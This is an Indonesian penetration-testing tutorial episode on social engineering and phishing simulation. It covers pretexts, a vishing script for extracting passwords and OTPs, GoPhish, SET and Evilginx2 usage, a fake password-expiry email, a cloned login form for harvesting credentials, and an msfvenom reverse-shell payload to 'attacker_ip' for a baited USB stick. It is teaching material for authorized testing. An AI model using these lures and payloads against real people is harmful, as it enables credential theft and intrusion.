Mempelajari teknik social engineering dan phishing simulation — pretexts, kampanye phishing, credential harvesting, dan reporting awareness — karena manusia seringkali menjadi titik terlemah dalam keamanan siber

Setelah di episode 10 kita mempelajari Active Directory pentesting — Kerberos attacks, BloodHound, dan lateral movement — pada episode ini kita beralih ke attack vector yang sama sekali berbeda: social engineering. Di dunia nyata, manusia seringkali menjadi titik terlemah dalam pertahanan keamanan.
Social engineering adalah manipulasi psikologis untuk membuat orang melakukan sesuatu yang menguntungkan penyerang. Dalam konteks pentesting, kita menggunakan social engineering untuk menguji kesadaran keamanan karyawan — bukan untuk menipu sungguhan.
Pretexting adalah menciptakan skenario palsu (pretext) untuk mendapatkan informasi atau akses:
| Pretext | Target | Tujuan |
|---|---|---|
| IT Helpdesk | Karyawan | Reset password |
| Vendor/Supplier | Procurement | Akses sistem |
| Auditor | Finance | Data sensitif |
| New Employee | HR | Credentials |
Vishing menggunakan telepon untuk manipulasi:
Vishing Framework
==================
1. Recon: dapatkan nama, jabatan, nomor telepon
2. Pretext: IT support, vendor, management
3. Urgency: "Akun anda akan diblokir dalam 1 jam"
4. Credential extraction: minta password/OTP
5. Documentation: catat semua interaksiTools untuk phishing simulation:
| Tool | Tipe | Keterangan |
|---|---|---|
| GoPhish | Open-source | Framework phishing profesional |
| King Phisher | Open-source | Template & analytics |
| Evilginx2 | Open-source | Advanced: credential + session hijack |
# Install GoPhish
wget https://github.com/gophish/gophish/releases/latest
unzip gophish_*.zip
./gphish
# Akses admin: https://localhost:8080
# Default: admin/gophishSubject: [URGENT] Password Expired - Action Required
Dear {{.FirstName}},
Your corporate password will expire in 24 hours. Please click the
link below to reset your password immediately:
<a href="{{.URL}}">Reset Password Now</a>
If you do not reset your password, your account will be locked.
IT Security TeamBuat halaman login yang identik dengan portal email kantor:
<!-- Clone dari portal asli -->
<form action="{{.PhishingURL}}" method="POST">
<input type="text" name="username" placeholder="Email">
<input type="password" name="password" placeholder="Password">
<button type="submit">Sign In</button>
</form>Caution
Phishing simulation hanya boleh dilakukan dengan written authorization dari management. Pastikan semua data kredentials dikumpulkan secara aman dan dihancurkan setelah engagement selesai.
# Social-Engineer Toolkit (SET)
setoolkit
# Pilih: 1) Social-Engineering Attacks → 2) Website Attack Vectors → 3) Credential Harvester
# Evilginx2 — Advanced (session hijack)
evilginx2
# Setup: config, phishlets, lures| Teknik | Deskripsi |
|---|---|
| Tailgating | Mengikuti karyawan masuk area terbatas |
| Baiting | USB berisi malware ditempatkan di area publik |
| Impersonation | Berpura-pura menjadi vendor/teknisi |
| Dumpster diving | Mencari informasi di sampah |
# Buat payload untuk USB
# Di Linux
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip -f exe -o payload.exe
# Copy ke USB, beri label menarik
# "2026 Salary Review - CONFIDENTIAL"Setelah phishing simulation, buat laporan:
# 1. Setup GoPhish
# 2. Import email template & landing page
# 3. Buat target list (nama, email, departemen)
# 4. Launch campaign
# 5. Monitor results di dashboard
# 6. Buat laporan awarenessInti yang harus dibawa pulang:
Di episode 12 selanjutnya, kita akan mempelajari web app security lanjutan — logic flaws, auth bypass, API abuse, dan deserialization attacks yang melampaui OWASP Top 10 dasar.